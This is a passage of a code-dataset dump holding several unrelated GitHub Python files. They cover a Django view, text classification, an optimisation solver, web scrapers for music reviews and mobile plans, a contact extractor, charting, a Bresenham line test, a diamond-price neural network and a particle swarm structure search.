Arte.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n if request.method == 'GET':\r\n serializer = ArteSerializer(arte)\r\n return Response(serializer.data)\r\n if request.method == 'PUT':\r\n data = JSONParser().parse(request)\r\n serializer = ArteSerializer(arte,data=data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n else:\r\n return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\r\n elif request.method == 'DELETE':\r\n arte.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)","repo_name":"IgnacioSIUU/Grupo-Cero","sub_path":"GrupoCero/GrupoCero/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20912663445","text":"## LOGISTIC REGRESSION\n## REVIEW CLASSIFICATION BASED ON WORDS\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\n \nvectorizer = CountVectorizer()\n\n## Fit the bag-of-words model\nbag = vectorizer.fit_transform(women_clothes_reviews['Final Text'])\n\n# Creating training data set from bag-of-words and dummy label\nX = bag.toarray()\ny = np.array(women_clothes_reviews['Recommended IND'])\n \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\n# Create training and test split\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n\n# Create an instance of LogisticRegression classifier\nlr = LogisticRegression(C=100.0, random_state=1, solver='lbfgs', multi_class='ovr')\n\n# Fit the model\nmodel=lr.fit(X_train, y_train)\n\n# Create the predictions\ny_predict = model.predict(X_test)\ny_predict_prob = model.predict_proba(X_test)\n \n# Use metrics.accuracy_score to measure the score\nprint(\"LogisticRegression Accuracy %.3f\" %metrics.accuracy_score(y_test, y_predict))\n\n#################################\nfrom sklearn.metrics import confusion_matrix\nconfusion_matrix(y_test,y_predict)\n\n## Self-defined threshold\ny_predict_self = [1 if prob > 0.102232 else 0 for prob in y_predict_prob[:,1]]\n# Model evaluation on accuracy\nconfusion_matrix(y_test,y_predict_self)\n\n\nfrom sklearn.metrics import roc_curve\nfrom matplotlib import pyplot\n\nfpr, tpr, thresholds = roc_curve(y_test, y_predict_prob[:,1])\n# plot the roc curve for the model\npyplot.plot([0,1], [0,1], linestyle='--', label='No Skill')\npyplot.plot(fpr, tpr, marker='.', label='Logistic')\n# axis labels\npyplot.xlabel('False Positive Rate')\npyplot.ylabel('True Positive Rate')\npyplot.legend()\n# show the plot\npyplot.show()\n\n## Optimal THRESHOLD BASED ON F1-SCORE \nfrom numpy import argmax\nfrom sklearn.metrics import precision_recall_curve\n# calculate roc curves\nprecision, recall, thresholds = precision_recall_curve(y_test, y_predict_prob[:,1])\n# convert to f score\nfscore = (2 * precision * recall) / (precision + recall)\n# locate the index of the largest f score\nix = argmax(fscore)\nprint('Best Threshold=%f, F-Score=%.3f' % (thresholds[ix], fscore[ix]))\n","repo_name":"ProfNascimento/LinearREG","sub_path":"NLP-LOGIST_REG.py","file_name":"NLP-LOGIST_REG.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75092381226","text":"\nimport torch\nimport torch.nn as nn\n\nimport Prox as px\n\nfrom importlib import reload\nreload(px)\n\n\nclass 
DRSolver(nn.Module):\n \"\"\"\n Implementation of Douglas Rachford (DR) Iterations for corrections of solution estimates for problems of the form\n min f(x) \n subject to:\n F_ineq(x) <= 0\n F_eq(x)= 0\n\n The problem is reformulated as\n\n min f(x)\n subject to:\n F(x,s) = 0\n s>=0\n\n for slack variables s, and F(x,s) defined as\n\n F(x,s) = [ F_eq(x) ; F_ineq(x) + s ]\n\n DR is an operator splitting approach, here applied to the splitting\n \n min g_1(x,s) + g_2(x,s)\n \n with\n g_1(x,s) = f(x) + i_{ (x,s) : F(x,s) = 0}\n g_2(x) = i_{ s : s>=0 }\n\n where i_{S} is the indicator function on set S.\n\n \"\"\"\n def __init__(self,f_obj = None, F_ineq = None, F_eq = None, x_dim = 0, n_ineq = 0, n_eq = 0,order = 'first',JF_fixed = False, parm_dim = None,num_steps=1):\n \"\"\"\n :param f_obj: functorch compatible function) a parameterized function f with input of the form (x,parms) where parms is a tensor that matches the batch of x, and has last dim parm features.\n f is defined unbatched, the method will call vmap, to \"raise\" f to batch dim\n gives the objective to be optimized\n :param F_ineq:(functorch compatible function) a parameterized function F with input of the form (x, parms) where parms is a tensor that matches the batch of x, and has last dim parm features.\n F is defined unbatched, the method will call vmap, to \"raise\" f to batch dim\n gives the inequality constraints to satisfy, F_ineq(x) <= 0\n :param F_eq:(functorch compatible function) a parameterized function F with input of the form (x, parms) where parms is a tensor that matches the batch of x, and has last dim parm features.\n F is defined unbatched, the method will call vmap, to \"raise\" f to batch dim\n gives the equality constraints to satisfy, F_eq(x) = 0\n :param x_dim: (int) dimension of the primal variables\n :param n_ineq: (int) number of inequality constraints\n :param n_eq: (int) number of equality constraints\n :param order: (str) one of {'first','second'} the order of the approximation used for f_obj\n :param JF_fixed: (Bool) Indicates if the Jacobian of F should be computed at each iteration. Default is False, if True Jacobian of F will be precomputed at x=0, parms = 0\n :param parm_dim: (int) the dimension of parms for precomputing Jacobian \n :param num_steps: (int) number of iteration steps for the Douglas Rachford method\n \"\"\"\n super().__init__()\n self.f_obj = f_obj\n self.F_ineq = F_ineq\n self.F_eq = F_eq\n self.x_dim = x_dim\n self.n_ineq = n_ineq\n self.n_eq = n_eq\n self.num_steps = num_steps\n self.order = order\n if n_eq > x_dim: print('ERROR: Equality constraints are overdetermined')\n #### Convert problem inputs to the standard form for the DR iterations\n\n #i.d. 
problem type\n #pid = \n # = 1 only equality constraints\n # = 2 only inequality constraints\n # = 3 both equality and inequality constraints\n # = 0 Error: no constraints\n pid = 2*(self.F_ineq != None) + (self.F_eq != None)\n self.pid = pid\n if pid == 0: print( 'ERROR: One of F_eq or F_ineq must be defined')\n if pid == 1:\n def F(xs, parms):\n return F_eq(xs,parms)\n if pid == 2:\n def F(xs,parms):\n x = xs[0:self.x_dim]\n s = xs[self.x_dim:]\n return self.F_ineq(x,parms) + s\n if pid ==3 :\n def Fs_ineq(xs,parms):\n x = xs[0:self.x_dim]\n s = xs[self.x_dim:]\n return torch.cat( (torch.zeros(self.n_eq), self.F_ineq(x,parms) + s))\n def Fs_eq(xs,parms):\n x = xs[0:self.x_dim]\n return torch.cat( (self.F_eq(x,parms), torch.zeros(self.n_ineq) ))\n def F(xs, parms):\n return Fs_eq(xs,parms) + Fs_ineq(xs,parms)\n self.F = F\n #### Set the Prox of g_1(x,s)\n self.JF_fixed = JF_fixed\n self.n_dim = self.x_dim + self.n_eq + self.n_ineq\n self.parm_dim = parm_dim\n if self.order == 'first': self.foF = px.FirstOrderObjectiveConstraintComposition(self.f_obj,self.F,JF_fixed = self.JF_fixed,n_dim = self.n_dim, parm_dim = self.parm_dim)\n if self.order == 'second': self.foF = px.SecondOrderObjectiveConstraintComposition(self.f_obj,self.F,JF_fixed = self.JF_fixed,n_dim = self.n_dim, parm_dim = self.parm_dim)\n ### Set the Prox of g_2(x,s)\n ## define the slack bounds\n upper_bound = 1e2*torch.ones(self.n_dim)\n lower_bound = torch.cat( (-1e2*torch.ones(self.x_dim + self.n_eq ),torch.zeros(self.n_ineq)))\n def f_upper(parms):\n return upper_bound\n def f_lower(parms):\n return lower_bound\n self.sp = px.BoxConstraint(f_lower,f_upper)\n def forward(self,x,parms):\n x = self.SlackHotStart(x,parms)\n x_k = x \n for n in range(self.num_steps):\n y_k = self.sp(x_k,parms)\n z_k = self.foF(2*y_k - x_k,parms)\n x_k_new = x_k + (z_k - y_k)\n x_k = x_k_new\n return x_k_new[:,:-self.n_ineq]\n def SlackHotStart(self,x,parms):\n x_init = x\n #add initial slack variables\n xz = torch.cat((x,torch.zeros((x.shape[0],self.n_ineq))),dim = -1)\n xs = torch.vmap(self.F)(xz,parms)\n slacks = -xs[:,-self.n_ineq:]\n x = torch.cat((x,slacks),dim = -1)\n s_plus = torch.cat( (torch.zeros(x.shape[0],self.x_dim),torch.relu(slacks)),dim = -1)\n grads = (self.foF.gamma/2)*self.foF.f_grad(x,parms)\n eta = s_plus + grads\n JFx = self.foF.JF(x,parms)\n ### Take a QR decomposition of the Jacobian\n with torch.no_grad():\n Q, R = torch.linalg.qr(torch.transpose(JFx,1,2),mode = 'complete')\n null_dim = Q.shape[-1] - R.shape[-1]\n R = R[:,:-null_dim,:]\n Qr = Q[:,:,:-null_dim]\n Qn = Q[:,:,-null_dim:]\n xs_plus = torch.cat( ( 1e3*torch.ones(x_init.shape),torch.relu(slacks)),dim = -1)\n P_diags = torch.abs(xs_plus) + 1e-3\n P_mats = torch.diag_embed(P_diags)\n QTPQ = torch.bmm(torch.transpose(Qr,1,2),torch.bmm(P_mats,Qr))\n # Compute the oblique projection\n xabs = torch.cat( (x_init,torch.abs(slacks)),dim = -1)\n xabs_vec = torch.unsqueeze(xabs,-1)\n eta_vec = torch.unsqueeze(eta,-1)\n z = torch.bmm(P_mats,xabs_vec - eta_vec)\n z = torch.bmm(torch.transpose(Qr,1,2),z)\n z = torch.linalg.solve(QTPQ,z)\n z = torch.bmm(Qr,z)\n z = z + eta_vec\n z = torch.squeeze(z,-1)\n new_slacks = z[:,-self.n_ineq:]\n new_slacks = 2*torch.relu(slacks) - new_slacks\n return torch.cat((z[:,0:-self.n_ineq],new_slacks),dim=-1)\n \n\n","repo_name":"pnnl/LOPO","sub_path":"DRcorrection/DRSolver.py","file_name":"DRSolver.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} 
+{"seq_id":"39305769717","text":"import lxml.html\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\nimport urllib\nimport lxml.html\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndataframe = {'genre':[], 'label':[], 'date':[], 'artist':[], 'score': [], 'text':[]}\n\n\n#Is passed an ablum review URL from get_reviews(). Scans url elements for key data points such as the album genre, label,\n#date of reivew, artist, album score, and the review text. This is done by finding the HTML classes associated with these\n#elements in the html code across differnt album reviews. Theses elements are appended to a dictionary.\ndef scrape(url):\n response = requests.get(url)\n\n response_text = response.text\n soup = BeautifulSoup(response_text, 'lxml')\n\n print(url)\n try:\n score = soup.find_all(['p', 'div'], {'class': rating(soup)})[0].text\n except:\n score = 'N/A'\n try:\n genre = soup.find_all('p', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB InfoSliceValue-gTzwxg hkSZSE btxYx clvEtZ'})[0].text\n except:\n genre = 'N/A'\n print('missing gnre')\n try:\n label = soup.find_all('p', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB InfoSliceValue-gTzwxg hkSZSE btxYx clvEtZ'})[1].text\n except:\n label = 'N/A'\n print('Missing label')\n try:\n date = soup.find_all('p', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB InfoSliceValue-gTzwxg hkSZSE btxYx clvEtZ'})[2].text\n except:\n date = 'N/A'\n print('missing date')\n try:\n artist = soup.find_all('div', {'class' : 'BaseWrap-sc-UABmB BaseText-fETRLB SplitScreenContentHeaderArtist-lfDCdQ hkSZSE FFNqX PRayn'})[0].text\n except:\n artist = 'N/A'\n print('missing artist')\n try:\n text = soup.find_all ('div', {'class' : 'body__inner-container'})[0].text\n except:\n text = 'N/A'\n print('missing text')\n\n dataframe['genre'].append(genre)\n dataframe['label'].append(label)\n dataframe['date'].append(date)\n dataframe['artist'].append(artist)\n dataframe['score'].append(score)\n dataframe['text'].append(text)\n\ndef rating(soup):\n elements = soup.find_all(['p', 'div'])\n for element in elements:\n try:\n cl = ' '.join(element.attrs['class'])\n if 'Rating' in cl:\n return cl\n except:\n continue\n\n#Is passed an artist page url from get_artists. Finds all url's within the html of the artist page that refer to album\n#reviews. Passes the specic album review URL to scrape.\ndef get_reviews(artist_url):\n artist_url = artist_url + 'albumreviews'\n artist_response = requests.get(artist_url)\n soup = BeautifulSoup(artist_response.text, 'lxml')\n links = soup.find_all('a')\n for link in links:\n href = link.get('href')\n if '/reviews/albums/' in href and href != '/reviews/albums/':\n full_link = 'https://pitchfork.com' + href\n scrape(full_link)\n\n#Goes through links in the saved HTML that contain artist and appends them to the pitchfork url. This new URL for the\n#Specific arist is passed to get_reviews()\ndef get_artists(html):\n data = open(html, 'r', encoding=\"utf-8\")\n soup = BeautifulSoup(data, 'html.parser')\n links = soup.find_all('a')\n for link in links:\n href = link.get('href')\n if '/artists/' in href and href != '/artists':\n new_link = 'https://pitchfork.com/' + href\n print(new_link)\n get_reviews(new_link)\n\n\n\n#get_reviews('https://pitchfork.com/artists/3139-of-montreal/')\n#dataframe = pd.DataFrame(dataframe)\n#print(dataframe.head())\n\n\n'''All Pitchfork reviews are contrained in different Genre pages. 
From those pages you can access artists, and from those\nartist pages you can access every review. The artist list, however, exists on an infinitely scrolling javascript page and\nto scrape these URLs selenium was used to scroll to the bottom of the page and then save the loaded HTML to a text document.\n'''\n\nchromedriver = 'C:\\Datasets\\chromedriver.exe'\nos.environ['webdriver.chrome.driver'] = chromedriver\ndriver = webdriver.Chrome(chromedriver)\ndriver.get(\"https://pitchfork.com/artists/by/genre/jazz/\")\nScrollNumber = 500\nfor i in range(1,ScrollNumber):\n    driver.execute_script(f\"window.scrollTo(1,{i*150})\")\n    time.sleep(0.3)\n\nfile = open('C:/PF/PFjazz.html', 'w', encoding=\"utf-8\")\nfile.write(driver.page_source)\nfile.close()\n\ndriver.close()\n\nget_artists('C:/PF/PFjazz.html')\n\ndf = pd.DataFrame(dataframe)\ndf.to_excel('C:/PF/PFjazz.xlsx')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Eric-Zanette/Pitchfork-Scraper","sub_path":"Pitchfork Scraper.py","file_name":"Pitchfork Scraper.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29556497029","text":"\r\nfrom PatternExtractor import extract_emails\r\nfrom PatternExtractor import extract_phone\r\nfrom PatternExtractor import read_text_file\r\nfrom PatternExtractor import validate_data\r\nimport csv\r\n\r\n\r\n\r\n\r\ndef main():\r\n\t#Read text from file\r\n\r\n\ttext=read_text_file('file.txt')\r\n\r\n\t#Extract Emails and Phones from the text\r\n\r\n\temails=extract_emails(text)\r\n\tphone_numbers=extract_phone(text)\r\n\r\n\tprint(emails)\r\n\r\n\r\n\r\n\t#Validate extracted data\r\n\tvalid_emails=validate_data (emails)\r\n\tvalid_phone_numbers=validate_data(phone_numbers)\r\n\r\n\t#print the extracted and validated data\r\n\r\n\tprint(\"Valid Email Addresses:\", valid_emails)\r\n\t\r\n\r\n\t\r\n\tprint(\"\\nValid phone numbers:\",valid_phone_numbers)\r\n\t\r\n\tcontacts={'valid emails':', '.join(valid_emails),\r\n\t\t 'valid phones':', '.join(valid_phone_numbers)\r\n\t\t\t }\r\n\t\r\n\tprint(contacts)\r\n\r\n\t#store data to csv file\r\n\twith open('contacts.csv', 'a') as f:\r\n\t\t#create csv writer\r\n\t\twriter=csv.DictWriter(f,fieldnames=contacts.keys())\r\n\r\n\t\t#append row to the csv\r\n\r\n\t\twriter.writerow(contacts)\r\n\t\r\n\r\nif __name__=='__main__':\r\n\tmain()\r\n","repo_name":"nivin-L7/Project-Regex1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14663239239","text":"from openpyxl import load_workbook\r\nfrom openpyxl.chart import (\r\n    RadarChart,\r\n    Reference,\r\n)\r\nimport numpy as np\r\n\r\ndef read_all_data(worksheet):\r\n    print(\"read_all_data...\")\r\n    data_list = []\r\n    for row in worksheet.values:\r\n        for value in row:\r\n            data_list.append(value)\r\n    print(\"data_list\",data_list)\r\n    dl = data_list\r\n    return dl\r\n\r\ndef caculate_frequence(dl):\r\n    print(\"caculate_frequence...\")\r\n    data_small_large = sorted(dl)\r\n    #print(\"data\",data)\r\n    unique_data = np.unique(data_small_large)\r\n    print(\"unique_data\",unique_data)\r\n    data_times = []\r\n    for i in unique_data:\r\n        data_times.append(data_small_large.count(i))\r\n    print(\"data_times\",data_times)\r\n    times_total = sum(data_times)\r\n    print(\"times_total\",times_total)\r\n    data_freq = []\r\n    for i in data_times:\r\n        freq_i = i / times_total\r\n        data_freq.append(freq_i)\r\n    df = data_freq\r\n    
print(\"df\",df)\r\n return df\r\n\r\ndef draw_picture(df,dl):\r\n print(\"draw_picture...\")\r\n for row in df:\r\n ws.append(row)\r\n chart = RadarChart()\r\n chart.type = \"filled\"\r\n #labels = Reference(ws, min_col=1, min_row=2, max_row=13)\r\n data = Reference(ws, min_col=1, max_col=1, min_row=1, max_row=len(dl))\r\n chart.add_data(data, titles_from_data=False)\r\n #chart.set_categories(labels)\r\n chart.style = 26\r\n chart.title = \"wind direction frequence\"\r\n chart.y_axis.delete = True\r\n ws.add_chart(chart, \"B1\")\r\n wb.save(r\"路径\")#放所需要保存的路径\r\n\r\ndef no_none(dl):\r\n print(\"no_none...\")\r\n for item in dl[:]:\r\n if item == None:\r\n dl.remove(item)\r\n return dl\r\n\r\nif __name__==\"__main__\":\r\n file_name = r'路径' + str(78) + '.xlsx' # 读取数据的文件名\r\n wb = load_workbook(file_name) # 加载工作本\r\n #print(wb.sheetnames)\r\n ws = wb.active # 获取Sheet1\r\n data_list = read_all_data(ws) # 读取所有的data\r\n data_list = no_none(data_list) # 处理NaN(空值)\r\n data_freq = caculate_frequence(data_list) # 计算频率\r\n draw_picture(data_freq,data_list) # 画图\r\n\r\n","repo_name":"030319/Machine-Learning---Performance-Prediction","sub_path":"py对excel画图.py","file_name":"py对excel画图.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42974464417","text":"import numpy as np;\nimport matplotlib.pyplot as plt;\n\n\n\n\n\ndef bresenham(x0,y0,x1,y1):\n\tdx = x1-x0\n\tdy = y1-y0\n\tsx = np.sign(dx)\n\tsy = np.sign(dy)\n\tdx = np.abs(dx);\n\tdy = np.abs(dy)\n\terr = dx - dy\n\n\tout = [(x0,y0)]\n\tx = x0;\n\ty = y0;\n\n\n\twhile(x != x1 or y != y1):\n\t\te2 = err << 1\n\t\tif(e2 > -dy):\n\t\t\terr -= dy\n\t\t\tx += sx\n\t\tif(e2 < dx):\n\t\t\terr += dx\n\t\t\ty += sy\n\t\tout += [(x,y)]\n\treturn out,(x1,y1);\n\n\n\n# print(line)\n\n\n# line = [(0,0),(1,1),(2,2),(3,3)]\nfor k in range(0,3):\n\toutarr = np.zeros((100,100))\n\tfor j in range(0,10):\n\t\tt = np.random.randint(100,size=4)\n\t\ttalt = np.array([t[2],t[3],t[0],t[1]])\n\t\tline,s = bresenham(*t);\n\t\tline2,s2 = bresenham(*talt)\n\t\t# print(t, line,s)\n\t\tfor i in line:\n\t\t\toutarr[i[0],i[1]] = 1\n\t\t\t#outarr[s[0],s[1]] = -1\n\t\tfor i in line2:\n\t\t\toutarr[i[0],i[1]] = -1\n\tplt.matshow(outarr)\n\tplt.show();\n","repo_name":"uofu-ccts/prisms-comp-model-stham","sub_path":"test/bresenham.py","file_name":"bresenham.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41850856793","text":"from data.web_scrapping.isp.friendly.friendly_toolkit import FriendlyToolkit\nfrom utils.constants.common_data import common_data\nfrom utils.package import Package\nfrom utils.scalex_toolkit import get_soup\n\n\nclass FriendlyMobile(FriendlyToolkit):\n\n def __init__(self) -> None:\n super().__init__()\n self.soup = get_soup(self.FRIENDLY_MOBILE_URL)\n self.packages = []\n self.get_packages()\n\n def get_packages(self):\n blocks = self.soup.select(\"tr\")\n for index, block in enumerate(blocks):\n if any(w in block.text for w in [\"PRICE\"]):\n continue\n\n data = common_data.copy()\n data.update({\n \"service_type\": \"MOBILE\",\n \"plan_type\": \"PREPAID\",\n \"title\": \"Freedom Plan\",\n \"link\": self.FRIENDLY_MOBILE_URL,\n \"isp\": \"friendly\",\n })\n\n data[\"price\"] = self.search_for_value(\n block, \"td\", [\"ro\", \"bz\"])\n\n data[\"data_allowance\"] = self.search_for_value(\n block, \"td\", [\"gb\", \"mb\"], type=\"data_allowance\")\n\n 
data[\"duration\"] = self.search_for_value(\n block, \"td\", [\"hour\", \"day\", \"week\", \"unlimited\"], type=\"duration\")\n\n data[\"flexi_minutes\"] = self.search_for_value(\n block, \"td\", [\"flexi\"], type=\"flexi_minutes\")\n\n data[\"local_minutes\"] = self.search_for_value(\n block, \"td\", [\"local\"], type=\"local_minutes\")\n\n package = Package(data)\n self.packages.append(package)\n","repo_name":"alkuyomisb/scalex_engine","sub_path":"data/web_scrapping/isp/friendly/friendly_mobile.py","file_name":"friendly_mobile.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2697393003","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 21:57:09 2022\n\n\"\"\"\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport os\n\nfrom random import randint\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, OrdinalEncoder\n\n\nfile_path = r\"B:\\MSI\\Downloads\\shrdc\\breast_cancer\\dataset\\diamonds.csv\"\nsave_path = r\"B:\\MSI\\Downloads\\shrdc\\diamond_price\\img\"\ndiamond_data = pd.read_csv(file_path)\n\ndiamond_data = diamond_data.drop('Unnamed: 0', axis=1)\ndiamond_features = diamond_data.copy()\ndiamond_label = diamond_features.pop('price')\n\nprint(\"------------------Features-------------------------\")\nprint(diamond_features.head())\nprint(\"-----------------Label----------------------\")\nprint(diamond_label.head())\n\ncut_categories = ['Fair', 'Good', 'Very Good', 'Premium', 'Ideal']\ncolour_categories = ['J', 'I', 'H', 'G', 'F', 'E', 'D']\nclarity_categories = ['I1', 'SI2', 'SI1', 'VS2', 'VS1', 'VVS2', 'VVS1', 'IF']\nordinal_encoder = OrdinalEncoder(categories=[cut_categories, colour_categories, clarity_categories])\ndiamond_features[['cut', 'color', 'clarity']] = ordinal_encoder.fit_transform(diamond_features[['cut', 'color', 'clarity']])\n\nprint(\"---------------Transformed Features--------------------\")\nprint(diamond_features.head())\n\nSEED = randint(100, 15000)\nx_train, x_iter, y_train, y_iter = train_test_split(diamond_features, diamond_label, test_size=0.4, random_state=SEED)\nx_val, x_test, y_val, y_test = train_test_split(x_iter, y_iter, test_size=0.5, random_state=SEED)\n\nstandard_scaler = StandardScaler()\nstandard_scaler.fit(x_train)\nx_train = standard_scaler.transform(x_train)\nx_val = standard_scaler.transform(x_val)\nx_test = standard_scaler.transform(x_test)\n\nnumber_input = x_train.shape[-1]\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.InputLayer(input_shape=number_input))\nmodel.add(tf.keras.layers.Dense(128, activation='elu'))\nmodel.add(tf.keras.layers.Dropout(0.25))\nmodel.add(tf.keras.layers.Dense(32, activation='elu'))\nmodel.add(tf.keras.layers.Dropout(0.25))\nmodel.add(tf.keras.layers.Dense(8, activation='elu'))\nmodel.add(tf.keras.layers.Dropout(0.25))\nmodel.add(tf.keras.layers.Dense(1))\n\nmodel.compile(optimizer='adam', \n loss='mse', \n metrics=['mae', 'mse'])\n\ntf.keras.utils.plot_model(model,\n to_file='model.png',\n show_shapes=True,\n show_layer_activations=True)\n\nbase_log_path = r\"B:\\MSI\\Downloads\\shrdc\\tensorboard_log\"\nlog_path = os.path.join(base_log_path, datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=log_path)\nes_callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=10, verbose=2)\nEPOCHS = 
100\nBATCH_SIZE = 64\nhistory = model.fit(x_train, y_train,\n validation_data=(x_val, y_val),\n batch_size=BATCH_SIZE,\n epochs=EPOCHS,\n callbacks=[tb_callback, es_callback])\n\n\nplt.loglog(history.history['loss'])\nplt.loglog(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['training', 'validation'], loc='upper left')\nplt.grid(True, which=\"both\", ls=\"-\")\nplt.savefig(os.path.join(save_path, \"loss.png\"), bbox_inches='tight')\nplt.show()\nplt.clf()\n\nplt.loglog(history.history['mae'])\nplt.loglog(history.history['val_mae'])\nplt.title('model mae')\nplt.ylabel('mae')\nplt.xlabel('epoch')\nplt.legend(['training', 'validation'], loc='upper left')\nplt.grid(True, which=\"both\", ls=\"-\")\nplt.savefig(os.path.join(save_path, \"mae.png\"), bbox_inches='tight')\nplt.show()\nplt.clf()\n\ntest_result = model.evaluate(x_test, y_test, batch_size=BATCH_SIZE)\nprint(f\"Test loss = {test_result[0]}\")\nprint(f\"Test MAE = {test_result[1]}\")\nprint(f\"Test MSE = {test_result[2]}\\n\\n\")\n\npredictions = np.squeeze(model.predict(x_test))\nlabels = np.squeeze(y_test)\nplt.plot(predictions, labels, \".\")\nplt.xlabel(\"Predictions\")\nplt.ylabel(\"Labels\")\nplt.title(\"Graph of Predictions vs Labels with Test Data\")\nplt.savefig(os.path.join(save_path, \"result.png\"), bbox_inches='tight')\nplt.show()","repo_name":"aplatyps/shrdc_ai05_dp","sub_path":"diamond_price_prediction.py","file_name":"diamond_price_prediction.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40503220597","text":"import os\n\nfrom pso.tools.utils import * \nfrom pso.tools.psoutils import * \n\nfrom ase.io import read, write\nfrom pso.tools.operations import *\n\nclass PSO(object):\n \"\"\"\n A class for creating a linear polymer from given RdKit molecules.\n\n Examples\n ---------\n\n\n Note\n -----\n\n RDKit package must be installed.\n \"\"\"\n \n __slots__ = ['input_file', 'cluster_file', 'substrate_file']\n\n def __init__(self, input_file, cluster_file, substrate_file):\n \"\"\"\n Initialize this class.\n \n Parameters\n -----------\n\n input_file : class.str\n Name of the input.dat file supplied by the user.\n \n cluster_file : class.str\n Name of the POSCAR file containing the cluster coordinates supplied by the user.\n\n substrate_file: class.str\n Name of the POSCAR file containing the surface coordinates supplied by the user.\n \n \"\"\"\n \n self.input_file = input_file\n self.cluster_file = cluster_file \n self.substrate_file = substrate_file \n \n \n def pso_struct_search(self): # , input_file, cluster_file, substrate_file):\n\n input_file= self.input_file\n cluster_file=self.cluster_file\n substrate_file=self.substrate_file\n \n startstep, maxstep, pop, command, cores=read_input_file(str(input_file))\n z_min,acc_pop,omegamax,omegamin,c1,c2=read_input_pso(str(input_file))\n \n #Read the cluster.POSCAR file and convert to Cartesian with selective dynamics style\n clusters = read(str(cluster_file), format='vasp')\n substrate = read(str(substrate_file), format='vasp')\n \n parent_dir=os.getcwd()\n gen_count=startstep\n\n # Random numbers for struct_parameters, angles and r1,r2 coefficients\n values=global_random_numbers(maxstep, pop, seed=35, output_name=\"struct_param\")\n vel=global_random_numbers(maxstep, pop, seed=42, output_name=\"vel_param\")\n coeff=pso_random_numbers(maxstep, pop, seed=13, output_name=\"pso_r1_r2\")\n\n #History of gbests\n 
gbest=[0]*(maxstep-1)\n \n while gen_count < maxstep:\n \n directory=\"gen_{}\".format(str(gen_count))\n path = os.path.join(parent_dir, directory)\n \n try: \n os.mkdir(path)\n \n except OSError as error: \n print(error)\n \n if gen_count <= 1:\n \n os.chdir(path)\n gen_dir=os.getcwd()\n\n x_t=[]; v_t=[]\n for i in range(pop):\n name_new_str=\"\".join([\"POSCAR\"])\n x_t.append(structure_creator(clusters, substrate, name_new_str, values[gen_count-1][i],z_min))\n v_t.append(tuple(vel[gen_count-1][i]))\n make_config_folders(gen_dir, parent_dir, i, name_new_str)\n\n subfolders=sub_list(gen_dir)\n gbest[gen_count-1]=ord_dict(vasp_energy(command, subfolders, x_t, v_t, int(cores)))[0]\n os.chdir(parent_dir)\n \n else:\n os.chdir(path)\n gen_dir_new=os.getcwd()\n ord_confs, mask_keys=get_prev_gen(gen_dir_new, acc_pop, gen_count)\n\n xt_new=[]; vt_new=[]\n vel_new=np.asarray(vel)\n conf_name, gbest_pos=get_gbest_pos(gbest, parent_dir)\n\n omega_new=omegamax-((omegamax-omegamin)/maxstep)*(gen_count-2)\n print (omega_new)\n \n for i in range(pop):\n if mask_keys[i]:\n # Creating folders to store these structures\n idx=ord_confs[i].split('_')[-1]\n name_new_str_rest=\"\".join([\"POSCAR\"]) \n #The pso propagation scheme\n pos_update, tmp_vel= pso_update(gbest_pos, ord_confs[i], gen_count,\n omega_new, c1, c2, coeff[gen_count][i][0], coeff[gen_count][i][1]) \n xt_new.append(structure_creator(clusters, substrate, name_new_str_rest, pos_update, z_min))\n vt_new.append(tmp_vel)\n make_config_folders(gen_dir_new, parent_dir, idx, name_new_str_rest)\n\n #Creation of random structures discarded by user-provided acc_pop \n else:\n idxf=ord_confs[i].split('_')[-1]\n name_new_str_rest=\"\".join([\"POSCAR\"])\n xt_new.append(structure_creator(clusters, substrate,\n name_new_str_rest, values[gen_count][i], z_min))\n vt_new.append(tuple(vel[gen_count][i]))\n make_config_folders(gen_dir_new, parent_dir, idxf, name_new_str_rest)\n \n 